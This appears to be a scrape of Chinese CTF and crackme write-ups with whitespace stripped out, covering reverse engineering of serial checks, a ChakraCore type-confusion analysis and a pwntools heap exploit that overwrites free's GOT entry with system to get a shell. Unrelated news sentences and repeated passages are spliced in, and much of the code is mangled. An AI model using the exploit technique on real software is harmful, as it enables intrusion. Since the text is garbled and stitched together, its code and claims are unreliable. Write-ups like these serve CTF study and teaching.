28F0pushoffsetaLuajit210Beta3;"".text:004028F5push917h;:004028FApushoffsetbyte_45A578;:004028FFpushesi;:00402900callluaL_::::0040290AcallluaJIT_:0040290Fpush0;:00402911push0;:00402913push0;:00402915pushesi;:00402916calllua_:0040291Baddesp,:0040291Etesteax,:00402920jnzshortloc_:::00402924calllua_:00402929pushoffsetaXut;"xut".text:::00402934calllua_:00402939pushoffsetaMyst;"myst".text:::00402944calllua_:00402949push0;:0040294Bpush1;:0040294Dpush0;:0040294Fpushesi;:00402950calllua_pcall....text:00402986push0FFFFFFFFh;:00402988pushesi;:00402989calllua_:0040298Eaddesp,:00402991testeax,:00402993jzshortloc_:00402995push0FFFFFFFFh;:00402997pushesi;:00402998calllua_:0040299Daddesp,:004029A0jmpshortloc_:004029A2moveax,[esp+104h+var_F0].text:004029A6testeax,:004029A8jzshortloc_4029B1xut=snifmyst()==1thenokmyst():x=xutx+=101*1001+(10101+1001*99)*100x*=983751509373x-=1023*13+1203*13*14+1230*13*14*15+1231*13*14*15*16x=(x+1)*2expected=1574592838300862641516215149137548264158058079230003764126382984039489925466995870724568174393389905601620735902909057604303543552180706761904if(x==expected)return1elsereturn0luajit分析根据luaJIT_setmode定位到lj_dispatch_update函数从lj_dispatch_update定位到lj_vm_asm_begin与lj_bc_ofs在lj_vm_asm_begin+lj_bc_ofs[i]处下断,分析各个bytecode的功能.text:0040AFCEcalllj_dispatch_:0040ACA9movzxesi,ds:lj_bc_ofs+:0040ACB0movzxedi,ds:lj_bc_ofs+:0040ACB7movzxebp,ds:lj_bc_ofs+:0040ACBEmovzxeax,ds:lj_bc_ofs+:0040ACC5addesi,offsetlj_vm_asm_:0040ACCBaddedi,offsetlj_vm_asm_:0040ACD1addebp,offsetlj_vm_asm_:0040ACD7addeax,offsetlj_vm_asm_beginKXCTF201710BYLoudy081.处理逻辑(大数运算用的gmp)sn长度为70,前6位是e,后面的是p已知n,d,pq,求e,p,qn:6248BC3AB92A33B000FDB88568F19727F92F79EB68FF6AD73203EFD20A3E331BE941C7AA288095F33BC4B255FD983114D480EFFBEE2E313E6218A57F9CCC8189d:2476A7F02588913F228923E1F36F963F29708C07B117396817A6B94C336FC77FF7D381925EB40CFED8FBE894570155E41569B4EC69B26CB0320105A29651CB4B2.求解因为e0x1000000,所以可以穷举e,得到e:F552B3有了e,因为e过小,可以直接得到p和q这里借用stackoverflow上的内容3.脚本importitertoolsfromgmpy2import*#e=0xF552B3n=0x6248BC3AB92A33B000FDB88568F19727F92F79EB68FF6AD73203EFD20A3E331BE941C7AA288095F33BC4B255FD983114D480EFFBEE2E313E6218A57F9CCC8189d=0x2476A7F02588913F228923E1F36F963F29708C07B117396817A6B94C336FC77FF7D381925EB40CFED8FBE894570155E41569B4EC69B26CB0320105A29651CB4Bdefget_e(n,d):(0xFFFFFF,-1):ifi=2:return0e=iifnotis_prime(e,500):continuem=0x12345678c=powmod(m,d,n)m2=powmod(c,e,n)ifm==m2:returnereturn0defget_p_q(e,n,d):ed=mul(e,d)k1=div(ed,n)kk=[k1-1,k1,k1+1]foriinrange(len(kk)):k=kk[i](t,rem)=t_divmod(ed-1,k)if(rem!=0):continues=n+(1)-(t)r=isqrt(mul(s,s)-mul(4,n))p=div(s+r,2)q=div(s-r,2)if(pq):p=qprint(sn:%X%X%(e,p))returne=get_e(n,d)print(e:%X%e)get_p_q(e,n,d)优点:没有使用获取LoadLibraryA函数。运行,OD附加前往401000,看着挺像处理代码的下断运行,输入sn后断下(运气挺好)这个应该是初始化luabytecode(看后面字符串,功能应该是xor)0040103D885C2436movbyteptrss:[esp+36],bl0040104188442437movbyteptrss:[esp+37],al00401045C644243807movbyteptrss:[esp+38],70040104A885C2439movbyteptrss:[esp+39],bl...初始化的栈信息0012FA4E0010927C0000000000001B4C4A02023B.抾......LJ;0012FA5E00020700030009360200003902010236....6..960012FA6E03000039030203120400001205010012..9...0012FA7E06010042030400430200000873756209.B.C.. string.0012FA9E00050175360100003901010112020000.u6..9..0012FAAE42010202080100005801028029010000B..X)..0012FABE4C010200360102003901030136020400L.6.96.0012FACE12030000290401004202030229037000..).B)6.96.0012FAEE12040000290502004203030229046500..).B)6.96.0012FB0E12050000290603004204030229056400..).B)6.96.0012FB2E12060000290704004205030229066900..).B)6.96.0012FB4E12070000290805004206030229077900..).B)6.96.0012FB6E12080000290906004207030229083100..)..B)6.96.0012FB8E12090000290A07004208030229093200...)..B).6.96..0012FBAE120A0000290B080042090302290A3300...) .B.).6..9..6..0012FBCE120B0000290C0900420A0302290B3400 ..)...B.) 6..9..6 .0012FBEE120C0000290D0A00420B0302290C3500...)...B ).6 .9  6..0012FC0E120D0000290E0B00420C0302290D3600...) .B.). 6..9..6..0012FC2E120E0000290F0C00420D0302290E3700..)..B.)....0012FC4E12100400121105001212060012130700....0012FC5E121408001215090012160A0012170B00..... .0012FC6E12180C004A0D0D000762790962786F72..J...bitlen string0012FC8E3D030002000600083600000027010100=...6....0012FC9E42000201330002003700030033000400B.3..7..3..0012FCAE370005004B000100096D61696E0007627..K...main.b0012FCBE7900086269740C726571756972650002y.0012FCCE0000FE55F9EAEBD15D00313233343536..㑳胙].1234560012FCDE00000000000000000000000000000000................0012FCEE00000000000000000000000000000000................0012FCFE00000000000000000000000000000000................lua初始化,43Cleaeax,dwordptrss:[esp+3C],380040220E85C0testeax,每个字符(恩,虽然是猜的,但是后面证明猜对了)lua_xor(sn[i])xor05120A2942417561358355940040222C55pushebp00,eax004022376AF5push-0B0040223956pushesi0040223A83F705xoredi,,eax004022446AF6push-0A0040224656pushesi0040224783F312xorebx,,eax004022516AF7push-90040225356pushesi0040225483F50Axorebp,,290040225F6AF8push-80040226156pushesi0040226289442458movdwordptrss:[esp+58],,420040226E6AF9push-70040227056pushesi0040227189442448movdwordptrss:[esp+48],,410040227D6AFApush-60040227F56pushesi0040228089442460movdwordptrss:[esp+60],,750040228C6AFBpush-50040228E56pushesi0040228F89442460movdwordptrss:[esp+60],,400040229B83F061xoreax,610040229E6AFCpush-4004022A056pushesi004022A189442418movdwordptrss:[esp+18],,35004022AD6AFDpush-3004022AF56pushesi004022B089442424movdwordptrss:[esp+24],,83004022BE6AFEpush-2004022C056pushesi004022C189442434movdwordptrss:[esp+34],,55004022CD6AFFpush-1004022CF56pushesi004022D089442444movdwordptrss:[esp+44],,94结果必须为:18161E2F4811213733865294004022F383FF18cmpedi,18004022F67554jnzshort0040234C004022F883FB16cmpebx,16004022FB754Fjnzshort0040234C004022FD83FD1Ecmpebp,1E00402300754Ajnzshort0040234C00402302837C24302Fcmpdwordptr[esp+30],2F004023077543jnzshort0040234C00402309837C241848cmpdwordptr[esp+18],480040230E753Cjnzshort0040234C00402310837C242811cmpdwordptr[esp+28],11004023157535jnzshort0040234C00402317837C242021cmpdwordptr[esp+20],210040231C752Ejnzshort0040234C0040231E837C241037cmpdwordptr[esp+10],37004023237527jnzshort0040234C00402325837C241433cmpdwordptr[esp+14],330040232A7520jnzshort0040234C0040232C817C241C86000cmpdwordptr[esp+1C],86004023347516jnzshort0040234C00402336837C242452cmpdwordptr[esp+24],520040233B750Fjnzshort0040234C0040233D817C242C94000cmpdwordptr[esp+2C],94004023457505jnzshort0040234C004023478D47E9leaeax,dwordptr[edi-17]0040234AEB02jmpshort0040234E0040234C33C0xoreax,eax没看lua代码,直接试了下voidtest(){BYTEkey1[12];//123456789012BYTEbuf1[12]={0x31,0x32,0x33,0x34,0x35,0x36,0x37,0x38,0x39,0x30,0x31,0x32};//call00412CE0的结果BYTEbuf2[12]={0x41,0x57,0x57,0x5D,0x4C,0x07,0x05,0x0B,0x0D,0x05,0x07,0x05};BYTEkey2[12]={0x05,0x12,0x0A,0x29,0x42,0x41,0x75,0x61,0x35,0x83,0x55,0x94};BYTEexpected[12]={0x18,0x16,0x1E,0x2F,0x48,0x11,0x21,0x37,0x33,0x86,0x52,0x94};for(inti=0;i12;i++){key1[i]=buf1[i]^buf2[i];}BYTEsn[13]={0};for(inti=0;i12;i++){sn[i]=key1[i]^key2[i]^expected[i];}printf(%s,sn);}maposafe2017,www.vns4877.com idapro打开,来到main函数fgets(sn,260,stru_4090E0);v3=strlen(sn)-1;if(v38||v320){sub_401BE0(aKeyLenErrorD__);return0;}输入长度为8-20个字符if(v30){do{v6=sn[v5];if(v6=0||v69)++v4;++v5;}while(v5v3);if(v4){sub_401BE0(aKeyFormatError);return0;}}字符组成为1-9big_init(b1);v22=0;big_load(b1,sn);nullsub_1();big_mul((int)b1,9);sn做为大数*9,即b1=sn*9while(1){big_init3(b2,sn);LOBYTE(v22)=1;v7=big_mul2((int)b1,(int)b2);v8=big_mul((int)b1,9)+v7;nullsub_1();if(v8||big_len((int)b1)%2!=1)gotoLABEL_16;v9=big_len((int)b1);v10=big_val((int)b1,v91);v11=big_val((int)b2,0);v12=b2;if(v10==v11)break;LABEL_17:LOBYTE(v22)=0;sub_401390(v12);if(v8){sub_401BE0(aWrongKey___);gotoLABEL_19;}}循环计算b1=b1*sn*9,直到b1长度为奇数且b1[len/2]==sn[0],其中b2==snb2_len=big_len((int)b2)-1;v14=1-big_len((int)b2);b1_len=big_len((int)b1);v16=big_compare(b1,(int)b2,b1_len+v14,1,b2_len,0);v17=big_len((int)b2);if(big_compare(b1,(int)b2,0,1,v17-1,1)+v16){v8=0;LABEL_16:v12=b2;gotoLABEL_17;}sub_401BE0(aWellDone);正向和反向比较b1和sn,长度为sn-1,即sn[1]开始的数字,至此可以确定是在求回文数。nt!_MMPFNLIST内存管理器持有处于相同状态的链在一起的物理页。这里的newArr的创建操作如下//IfthesourceobjectisanArrayexoticobjectweshouldtr*newObj=ArraySpeciesCreate(obj,0,scriptContext);JavascriptArray*newArr=nullptr;//Ifthenewobjectwecreatedisanarray,rememberthatasitwillsaveustimesettingpropertiesintheobjectbelowif(JavascriptArray::Is(newObj)){newArr=JavascriptArray::FromVar(newObj);}注意虽然进行了转换,但是最后newArr却是NativeIntArray类型=0x000001E353F7C5100x000001E353F7C5100000000000000003........0x000001E353F7C5180000000600000000........0x000001E353F7C5200000000000000000........0x000001E353F7C5280000000100000002........0x000001E353F7C5300000000380000002.......\n0x000001E353F7C5388000000280000002......\n观察接下来的取值和赋值操作可以发现问题for(uint32k=0;klength;k++){if(!pArr-DirectGetItemAtFull(k,element)){continue;}selected=callBackFn-GetEntryPoint()(callBackFn,CallInfo(CallFlags_Value,4),thisArg,element,JavascriptNumber::ToVar(k,scriptContext),pArr);if(JavascriptConversion::ToBoolean(selected,scriptContext)){//Trytofastpathifthereturnobjectisanarrayif(newArr){newArr-DirectSetItemAt(i,element);}...pArr的类型为JavascriptArraynewArr的类型为JavascriptNativeIntArray这里直接从pArr中取出值放入了newArr,很明显是一个类型混淆造成这个混淆的根本原因是设置了staticget[](){returndummy;}导致返回了一个JavascriptNativeIntArray,从而与JavascriptArray造成混淆。下面程序进行穷举:importosdeflength(number):n=numberl=0whilen0:n=n/10l+=1returnldefisok(number):res=0n=numberwhilen0:res=res*10+n%10n=n/10ifres==number:return1return0deftest(a):b2=a*9i=0whilei2:b2*=ab2*=9if(isok(b2)==1):print(%d=%d%(a,b2))breaki+=1return0defskip(a):b=1n=awhilen0:if((n%10)==0):a+=bn=n/10b=b*10returnadefmain():printskip(10089000)i=11111111whilei=99999999:i=skip(i)test(i)i+=1printoverreturn0if__name__==__main__:main()输出结果为:需要反向输入,即sn=97654321。我有一段数据我自己计算的和程序计算的不一样我的C版本和JAVA版本计算的也不一样,蒙圈了,谁有现成的代码,帮我算一下可以吗?数据chatimg:44F2D2EA8BBDB04D56236E62B98E6A1BC版本结果代码地址:http:///l1028386804/article/details/50748724879BD001A16D4B20JAVA版结果代码地址:http:///sjiang2142/article/details/8128428publicstaticfinalStringCrc64String(StringparamString){(Crc64Long(paramString),16);}java版是toString后的结果-362868a8b5c9484d正确结果-57c054443d9021e这个是程序中的代码publicclassUtils{privatestaticlong[]CRCTable=newlong[256];privatestaticfinallongINITIALCRC=-1L;privatestaticfinallongPOLY64REV=-7661587058870466123L;publicstaticfinalStringTAG==false;publicstaticfinallongCrc64Long(StringparamString){if((paramString==null)||(()==0)){l2=0L;returnl2;}longl2=-1L;inti;if(!init){i=0;}intj;for(;;){if(i=256){init=true;j=();i=0;l1=l2;for(;;){l2=l1;if(i=j){break;}intk=(i);l1=CRCTable[(((int)l1^k)0xFF)]^l18;i+=1;}}l1=i;j=0;if(j8){breaklabel121;}CRCTable[i]=l1;i+=1;}label121:if(((int)l10x1)!=0){}for(longl1=l11^0xAC4BC9B5;;l1=1){j+=1;break;}}请问为什么会这样呢?实在是想不通~~(完)+1 ,穷举过程非常漫长。截止到目前,全市共建立水稻、茶叶、百香果、蔬菜、马蹄、鸡、鱼等17个作物品种的富硒农产品生产示范基地88个,面积达5万多亩。,此次画展共展出50幅荷花作品,吸引了广大市民前来观看。源码已经上传至附件(pS:r3的小玩意,只给需要的人..表哥笑笑就好自绘界面和一些小细节小方法还是比较适合MFC新手参考的,代码注释已经写得含详细了这就不贴代码了)实现功能:辣鸡清理:系统临时文件,浏览器辣鸡,浏览器cookie,内存优化,vs项目辣鸡..软件管理,系统服务,软件卸载,注册表启动项,添加和删除,病毒查杀,md5查杀,白名单查杀,全路径查杀,网络流量监控,主动防御(尽情的骂我吧..后来写着写着感觉主防太难写要稳定的hookn个函数)..内含基本ado数据库编程GDI自绘实现网络监控,有个优化的小火箭,最小化时支持程序隐藏,里面有Button类,一个Button一个类这个类继承自CButton然后用此类创建对象和Button的IDC_Button关联,然后设置Button的属性,OwnDrawer为ture,这是这些按钮的,还有一些list控件颜色,静态控件字体设置,颜色设置,还有静态控件刷新防止重影的方法,剩下的就是api用法和C++语法了....[IMG][/IMG][IMG][/IMG]idapro打开,来到main函数fgets(sn,260,stru_4090E0);v3=strlen(sn)-1;if(v38||v320){sub_401BE0(aKeyLenErrorD__);return0;}输入长度为8-20个字符if(v30){do{v6=sn[v5];if(v6=0||v69)++v4;++v5;}while(v5v3);if(v4){sub_401BE0(aKeyFormatError);return0;}}字符组成为1-9big_init(b1);v22=0;big_load(b1,sn);nullsub_1();big_mul((int)b1,9);sn做为大数*9,即b1=sn*9while(1){big_init3(b2,sn);LOBYTE(v22)=1;v7=big_mul2((int)b1,(int)b2);v8=big_mul((int)b1,9)+v7;nullsub_1();if(v8||big_len((int)b1)%2!=1)gotoLABEL_16;v9=big_len((int)b1);v10=big_val((int)b1,v91);v11=big_val((int)b2,0);v12=b2;if(v10==v11)break;LABEL_17:LOBYTE(v22)=0;sub_401390(v12);if(v8){sub_401BE0(aWrongKey___);gotoLABEL_19;}}循环计算b1=b1*sn*9,直到b1长度为奇数且b1[len/2]==sn[0],其中b2==snb2_len=big_len((int)b2)-1;v14=1-big_len((int)b2);b1_len=big_len((int)b1);v16=big_compare(b1,(int)b2,b1_len+v14,1,b2_len,0);v17=big_len((int)b2);if(big_compare(b1,(int)b2,0,1,v17-1,1)+v16){v8=0;LABEL_16:v12=b2;gotoLABEL_17;}sub_401BE0(aWellDone);正向和反向比较b1和sn,长度为sn-1,即sn[1]开始的数字,至此可以确定是在求回文数。 我们要充分发挥这一得天独厚的优势,依托西江黄金水道,在现代物流、新兴产业、生态旅游、城市建设、县域经济发展等各方面加大力度,加速港产城融合发展,加快建成西江流域核心港口和新兴工业城市。处理逻辑encode1是base64,encode2和encode3比较简单,略过sn=encode3(sn)+encode2(sn)+encode1(sn)publicclassMainextendsac{...protectedvoidonCreate(){();...//这个不懂为什么没生效,生效的是基类那个(newView$OnClickListener(){publicvoidonClick(Viewv){Stringv2=().toString().trim();if(((v2)+(v2)+(v2))==1){(,true);}else{(,false);}}});}}publicclassuvextendscc{...protectedvoidonCreate(BundlesavedInstanceState){(newView$OnClickListener(){publicvoidonClick(Viewv){Stringv2=().toString().trim();if(((v2)+(v2)+(v2))==1){(,true);}else{(,false);}}});}}publicclassua{static{(enjoy);}...publicstaticnativeintcheck(uathis,Stringarg1){}}处理逻辑JNI_OnLoad中有两个校验和反调试的地方,静态分析的时候直接nop掉,安装完后再替换掉就可以正常调试了(有检测dexsignature和TracerPid什么的).text:00001F4CBLcheck_:00001F50BLcheck_threadso中的check函数.text:00001F38MOVSR3,#:00001F3CLDRR5,[R2,R3].text:00001F3ELDRR2,=(off_5E54-0x1F48).text:00001F40MOVSR0,:00001F42MOVSR3,#:00001F44ADDR2,PCoff_::00005E54off_5E54JNINativeMethodbyte_5E60,aLjavaLangStrin,check+1len(sn)=120,原始sn长度范围(x+x+x/3*4=120):11~36从结果来看原始sn长度是36,但是我后面是从11开始穷举的,浪费了大量的时间.mytext:0000313ELDRR1,[R5].mytext:00003140MOVSR3,#:00003144LDRR3,[R1,R3].mytext:00003146MOVSR2,#:00003148MOVSR1,:0000314AMOVSR0,::0000314EMOVSR6,:00003150BLj_j_strlen_:00003154STRR4,[SP,#0x50+var_4C].mytext:00003156MOVSR1,#:00003158CMPR0,#:0000315ABGTloc_:0000315CADDR4,SP,#0x50+:0000315EMOVSR2,#:00003160MOVSR0,:00003162BLj_j_memset_:00003166MOVSR1,:00003168MOVSR2,#:0000316AMOVSR0,:0000316CBLj_j_memcpy_:00003170LDRR2,[R5].mytext:00003172MOVSR3,#:00003176LDRR3,[R2,R3].mytext:00003178MOVSR1,:0000317AMOVSR2,:0000317CMOVSR0,::00003180MOVSR0,:00003182BLj_j_strlen_:00003186MOVSR1,:00003188MOVSR0,:0000318ABLcheck_snBYTEbuf[40];BYTEkey1[8];BYTEkey2[16];CopyMemory(buf,sn,36);FillMemory(buf+36,0x04,0x04);des_enc(buf,sizeof(buf),key1);(这里des_set_key在处理PC2_Table的时候与标准有偏差)CopyMemory(key2[12],buf[32],4);rc6_encrypt(buf,32,key2,sizeof(key2));(这个不常碰到,跟了一遍)memcmp(buf,expected,32)==0rc6与标准的区别:Q:0x9e3779b9L=0x61C88647L处理前和处理后都进行了byteswap32signedint__fastcallcheck_sn(constvoid*a1,size_ta2){...if(a2==36){v6=j_j_malloc(0x28u);v7=v6;if(v6){j_j_memcpy(v6,v3,v4);v7[36]=4;v7[37]=4;v7[38]=4;v7[39]=4;do{v8=g_key1[v2];v9=0;do{v17[8*v2+v9]=(v8(7-v9))1;++v9;}while(v9!=8);++v2;}while(v2!=8);des_set_key((int)v17);v10=0;do{v11=v7[v10];j_j_memcpy(dest,v7[v10],8u);v15=0;v16=0;des_1840((int)dest,(int)v15);v10+=8;j_j_memcpy(v11,v15,8u);}while(v10!=40);update_key2((int)g_key2,(int)v15);rc6_encrypt(v7,0x20u,(int)g_key2,16);v12=0;while((unsigned__int8)v7[v12]==byte_5D3D[v12]){if(++v12==32){result=1;gotoLABEL_14;}}}}result=0;...}3.穷举sn以kxuectf{开头,以}结尾这里直接按sn长度为36位来穷举了voidDes_SetKey(constcharKey[8]){staticboolK[64];staticboolKL[56];staticboolKR[56];ByteToBit(K,Key,64);Transform(K,K,PC1_Table,56);CopyMemory(KL[0],K[0],28);CopyMemory(KL[28],K[0],28);CopyMemory(KR[0],K[28],28);CopyMemory(KR[28],K[28],28);intoffset=0;for(inti=0;ii++){offset+=LOOP_Table[i];boolTmp[256];for(intn=0;nn++){if(PC2_Table[n]=28){Tmp[n]=KR[PC2_Table[n]-1-28+offset];}else{Tmp[n]=KL[PC2_Table[n]-1+offset];}}memcpy(SubKey[i],Tmp,48);}}voidtest_sn36(){constchar*charset=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789{}constchar*charset2=^_`mEJCTNKOGWRSFYVLZQAH[\\]upibejctnkogwrsfyvlzqahmdxKOGWRSFYVLuiconstchar*charset3=NOPQRSTUVWXYZABCDEFGHIJKLMnopqrstuvwxyzabcdefghijklm76543210}{intsn_len=36;intindices[36];charsn[40]=BYTEkey1[8]={0xFD,0xB4,0x68,0x54,0x08,0xCD,0x56,0x4E};BYTEkey2[16]={0x65,0x48,0x32,0xEF,0xBA,0xCD,0x56,0x4E,0x0F,0x9B,0x1D,0x27,0x00,0x00,0x00,0x00};CopyMemory(sn,kxuectf{,8);strings1=encode3((PBYTE)sn,8);for(intk1=0;k164;k1++){for(intk2=0;k264;k2++){for(intk3=0;k364;k3++){BYTEexpected[32]={0x42,0xD3,0xC3,0xC2,0xF1,0x2A,0xE9,0x2D,0x66,0xC9,0x28,0x22,0x2C,0xEB,0x54,0x0E,0x94,0x07,0xE5,0x77,0x4A,0x92,0xB7,0x92,0x2E,0x5D,0xFD,0xF0,0xF3,0x54,0x9F,0xC6};BYTEbuf1[8];buf1[0]=charset3[k1];buf1[1]=charset3[k2];buf1[2]=charset3[k3];buf1[3]=charset3[63];FillMemory(buf1+4,4,0x04);des_encrypt(buf1,8,key1);CopyMemory(key2[12],buf1,4);rc6_decrypt(expected,sizeof(expected),key2);des_decrypt(expected,sizeof(expected),key1);if(memcmp(expected,_str(),8)==0){CopyMemory(sn,expected,32);sn[32]=charset3[k1];sn[33]=charset3[k2];sn[34]=charset3[k3];sn[35]=charset3[63];sn[sn_len]=0;conver_charset(sn,sn_len,indices,charset,charset3);printf(%s,sn);}}}}}kxuectf{D3crypted1sV3rylntere5tin91}Payload:要注入的DLL在网上搜索了一些关于DLL注入的资料,发现都没有被注入的DLL的实现,这里首先占用少量篇幅来说明DLL的实现。,平行Mark-EvacuateGC的一大优点是可以提供确切的活动性信息。秉承着技术与干货的原则,看雪学院于2017年11月成功举办了第一届安全开发者峰会,议题涵盖了安全编程、软件安全测试、智能设备安全、物联网安全、漏洞挖掘、移动安全、WEB安全、密码学、逆向技术、加密与解密、系统安全等,吸引了业内顶尖的开发者和技术专家,旨在推动软件开发安全的深入交流与分享,为安全人员、软件开发者、广大互联网人士及行业相关人士提供最具价值的交流平台。通过上述分析,我们只需将“JPyjup3eCyJjlkV6DmSmGHQ=”base64解码再rc4解密,即是sn使用在线rc4解密并有base64编码功能的,进行解密:sn=madebyericky94528今年以来,针对行政审批中介服务存在的行业垄断、监管缺失、收费偏高、效率低下、竞争无序等反映强烈的问题,贵港市勇于“破冰”,深入推进中介机构管理体制改革,在广西建立了首家行政审批“中介超市”,对服务技术相近的中介服务事项进行归并,统一由一家机构(联合体)实施,在政府投资项目中推行“三测合一”、“联合踏勘”、“多评合一”等中介服务方式。,MMPFNLIST结构体持有这些链表的头。、如果我们从一个函数返回,那么会弹出栈的顶部。源码已经上传至附件(pS:r3的小玩意,只给需要的人..表哥笑笑就好自绘界面和一些小细节小方法还是比较适合MFC新手参考的,代码注释已经写得含详细了这就不贴代码了)实现功能:辣鸡清理:系统临时文件,浏览器辣鸡,浏览器cookie,内存优化,vs项目辣鸡..软件管理,系统服务,软件卸载,注册表启动项,添加和删除,病毒查杀,md5查杀,白名单查杀,全路径查杀,网络流量监控,主动防御(尽情的骂我吧..后来写着写着感觉主防太难写要稳定的hookn个函数)..内含基本ado数据库编程GDI自绘实现网络监控,有个优化的小火箭,最小化时支持程序隐藏,里面有Button类,一个Button一个类这个类继承自CButton然后用此类创建对象和Button的IDC_Button关联,然后设置Button的属性,OwnDrawer为ture,这是这些按钮的,还有一些list控件颜色,静态控件字体设置,颜色设置,还有静态控件刷新防止重影的方法,剩下的就是api用法和C++语法了....[IMG][/IMG][IMG][/IMG]1.处理逻辑(大数运算用的gmp)sn长度为70,前6位是e,后面的是p已知n,d,pq,求e,p,qn:6248BC3AB92A33B000FDB88568F19727F92F79EB68FF6AD73203EFD20A3E331BE941C7AA288095F33BC4B255FD983114D480EFFBEE2E313E6218A57F9CCC8189d:2476A7F02588913F228923E1F36F963F29708C07B117396817A6B94C336FC77FF7D381925EB40CFED8FBE894570155E41569B4EC69B26CB0320105A29651CB4B2.求解因为e0x1000000,所以可以穷举e,得到e:F552B3有了e,因为e过小,可以直接得到p和q这里借用stackoverflow上的内容3.脚本importitertoolsfromgmpy2import*#e=0xF552B3n=0x6248BC3AB92A33B000FDB88568F19727F92F79EB68FF6AD73203EFD20A3E331BE941C7AA288095F33BC4B255FD983114D480EFFBEE2E313E6218A57F9CCC8189d=0x2476A7F02588913F228923E1F36F963F29708C07B117396817A6B94C336FC77FF7D381925EB40CFED8FBE894570155E41569B4EC69B26CB0320105A29651CB4Bdefget_e(n,d):(0xFFFFFF,-1):ifi=2:return0e=iifnotis_prime(e,500):continuem=0x12345678c=powmod(m,d,n)m2=powmod(c,e,n)ifm==m2:returnereturn0defget_p_q(e,n,d):ed=mul(e,d)k1=div(ed,n)kk=[k1-1,k1,k1+1]foriinrange(len(kk)):k=kk[i](t,rem)=t_divmod(ed-1,k)if(rem!=0):continues=n+(1)-(t)r=isqrt(mul(s,s)-mul(4,n))p=div(s+r,2)q=div(s-r,2)if(pq):p=qprint(sn:%X%X%(e,p))returne=get_e(n,d)print(e:%X%e)get_p_q(e,n,d)来源:Forcepoint安全实验室2017年10月25日本文由看雪翻译小组编译通过分析,下面使用python进行穷举,代码如下:importhashlibimportsysdefhash_md5(src):myMd5=()(src)myMd5_Digest=()returnmyMd5_Digestdefis_ok(v):ifv[2:12]==888aeda4ab:return1return0defdo_md5(src):x=x+=chr(ord(src[0])+1)foriinrange(1,len(src)):x+=chr(ord(src[i])+i)x=hash_md5(hash_md5(x))returnxdefget_sn(str,num):if(num==1):forxinstr:yieldxelse:forxinstr:foryinget_sn(str,num-1):yieldx+yif__name__==__main__:printis_ok(a3888aeda4abba91f31c8e0caae48cb9)#000000x=do_md5(000000)printx[2:12]==fd9e2ddbd6forsninget_sn(0123456789abcdefghijklmnopqrstuvwxyz,6):x=do_md5(sn)ifsn[2:6]==0000:printsnifis_ok(x)==1:printsn=+snbreak2018安全开发者峰会是由拥有18年悠久历史的老牌安全技术社区——看雪学院举办,会议面向开发者、安全人员及高端技术从业人员,是国内开发者与安全人才的年度盛事。,Arch:amd64-64-littleRELRO:PartialRELROStack:CanaryfoundNX:NXenabledPIE:PIEenabled1:newbox1~box52:deletefree完之后没有修改in_use标志,可以多次free,存在UAF,只有box2和box3可以free3:edit4:print5:guessseed=seed;srand((unignedint)seed);v=rand();if(input()==v)printseed;elseprintv;解题思路我这个解法好像有点麻烦,等结束后学习下标准解法是什么样的..leakprocessbase,leaklibcbase,overwritegot,getshelltest_####*seed=0;intmain(){seed=seed;srand(*(unsignedint*)seed);printf("%p",seed);printf("0x%x",rand());return0;}guess_####*seed=0;intmain(intargc,char**argv){intlow3=atoi(argv[1]);intr=atoi(argv[2]);unsignedintseed;unsignedinti;for(i=0;i=0xFFFFF;i++){seed=i12;seed+=low3;srand(seed);if(rand()==r){printf("0x%x",rand());return0;}}printf("end");return0;}###=Truefrompwnimport*importsyscontext(arch=amd64,kernel=amd64,os=linux)#_level=debugelf=ELF(./club)ifargs[LOCAL]:libc_path=/lib/x86_64-linux-gnu/io=process(./club)("processbase:"+hex(()[/root/Desktop/test/pediy_pwn/club]))("processlibc_base:"+hex(()[libc_path]))else:libc_path=./io=remote(,8888)libc=ELF(libc_path)defcmd_new(index,size):()(1)()(str(index))()(str(size))()returndefcmd_delete(index):()(2)()(str(index))returndefcmd_edit(index,buf):()(3)()(str(index))(buf)returndefcmd_print(index):()(4)()(str(index))data=()returndatadefcmd_guess_wrong(v):()(5)()(str(v))(Thenumberis)data=(!)[:-1]returndatadefcmd_guess_right(v):()(5)()(str(v))(Yougetasecret:)data=(!)[:-1]returndatadefcmd_quit(name):()(6)()(name)()returndefexploit():#leakprocessbasev=cmd_guess_wrong(0)p_guess=process([./guess_seed,str(0x148),v])guess_r=p_()#printguess_rseed=cmd_guess_right(int(guess_r,16))#printhex(int(v))process_base=int(seed)-("leakedprocessbase:"+hex(process_base))#(io)#input()#triggercoaleace#usebox4toeditbox2box3len2=0x1A0len3=0x1F0cmd_new(2,len2)cmd_edit(2,A*len2)cmd_new(3,len3)cmd_delete(2)cmd_delete(3)cmd_new(4,len2+len3)data=cmd_print(4)[:6]libc_main_arena_top=0x3C4B78libc_base=u64((8,\x00))-libc_main_arena_topprint(leakedlibc_base:%x%libc_base)#createafakefreechunkinsidebox2beforebox3box2_ptr=process_base+0x202110print(box2_ptr:%x%box2_ptr)buf=buf+=p64(0)+p64(len2+1)+p64(box2_ptr-0x18)+p64(box2_ptr-0x10)buf+=A*(len2-0x20)buf+=p64(len2)buf+=p64(len3)cmd_edit(4,buf)cmd_delete(3)#box2_ptr-0x18writtentobox2_ptrcmd_edit(3,/bin/sh\x00)#[box2]=got_freebuf=buf+=p64(0)buf+=p64(0)#box0buf+=p64(0)#box1buf+=p64(process_base+[free])cmd_edit(2,buf)#[got_free]=systembuf=buf+=p64(libc_base+[system])cmd_edit(2,buf)#system(/bin/sh)cmd_delete(3)()returnexploit()但这个样本有明显的特征:解析PE结构,所以当我们遇到这种样本的时候,可以考虑为反射式DLL注入。:0040100Dmovdword_41B034,:00401017callget_:::00401026moveax,dword_:0040102Btesteax,:0040102Djnzshortloc_:0040102FpushoffsetaYouGetIt;"Yougetit!".text:00401034callsub_:00401039addesp,:0040103Cxoreax,:0040103Eretncheck1v0!=0,v1!=0,v0!=v15*(v1-v0)+v1=0x8F503A4213*(v1-v0)+v0=0xEF503A42化简第一个等式得6*v1-5*v0=0x8F503A42,记为(1)check2v0!=0,v1!=0,v0!=v117*(v1-v0)+v1=0xF3A948837*(v1-v0)+v0=0x33A94883化简第一个等式得18*v1-17*v0=0xF3A94883,记为(2)化简(1),(2)得-2*v0=0x45B899BD,显然不成立2get_sn存在溢出,溢出修改返回地址为0x00413131,sn格式为:11112222333311Av0=0x31313131v1=0x32323232v2=0x33333333第一个验证:4*(v0-v1)+v0+v2=:004133E9subeax,0EAF917E2h第二个验证:3*(v0-v1)+v0+v2=:004135F7subeax,0E8F508C8h第三个验证:3*(v0-v1)+v0-v2=:004136D8s